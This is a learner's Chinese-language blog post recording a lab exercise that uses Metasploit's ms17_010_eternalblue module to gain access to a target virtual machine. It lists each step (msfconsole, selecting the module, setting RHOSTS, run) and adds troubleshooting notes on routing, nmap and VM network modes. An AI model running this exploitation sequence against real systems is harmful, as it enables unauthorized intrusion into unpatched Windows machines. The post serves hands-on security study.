首先,附上学习视频链接:https://www.bilibili.com/video/BV163411972n?p=2&vd_source=477981387827d9c65f4d5ccb1e6869ea
然后记录一下整体思路:
记录一下一个新学的技巧:ctrl + shift + +可以对页面进行放大
step1,常规思路,切换到root获取最高权限(懒得切每次用sudo也行)
sudo su
或者打全了 (附:完整格式是 sudo su 用户名)
sudo su root
step2,启动metasploit
msfconsole
(每次启动metasploit都有新图,还挺好玩的,嘿嘿)
成功后开头如下(忽略那个突兀的水印)。6代表的是metasploit的版本
得到靶机(攻击对象)的ip地址,首先ping看看
ping ip地址
确保有time = 0.0x ms的出现。ping不会自动终止,需要 ctrl+c强行终止。
查找能攻击永恒之蓝漏洞的脚本(ms17_010是用windows官方给永恒之蓝的编号,表示windows2017年10号漏洞。可以去官网查找更新文档里的编号。)
exploit是攻击脚本,auxiliary 是辅助脚本,检测漏洞
以下方式二选一使用脚本:
use 0
use exploit/windows/smb/ms17_010_eternalblue
查看模块设置
show options
或者
options
required表示是否必须,current setting下空着的即为未设置
设置攻击目标
set RHOSTS 靶机ip地址
再查看一下模块设置就会发现RHOSTS被填上了
模块设置里面的payload是攻击的一些设置,此处略过,LHOST是监听地址,ip对应本虚拟机ip;LPORT是端口,有近60000多个
发射!!
run
出现这个即表示发射成功,成功获取权限
总体上如果没有意外的话整个学习也就到此为止了。
所以下面是来记录一下遇到的一些问题的
————————————莫名喜欢用分割线呢————————————
尝试了多次,但总是异曲同工的taget。先前没有截图
总结以下尝试思路,以下情况仅在nat模式下,且源于学长建议,未进行尝试。技术太菜,还没学桥接。
1、检查route,查看本机到靶机的路由。确保没有绕到更远的路由
2、 使用tracepath/traceroute,查看流量走向。
具体了解可以参考如下:
https://blog.csdn.net/weixin_45217447/article/details/130246991
3、检查端口是否启用
nmap 端口号 主机ip
————————一些念念叨叨——————
折腾了几天,发现是window的虚拟机网络适配器设成桥接模式了(瘫
就,很难评吧。
但至少算是解决了(?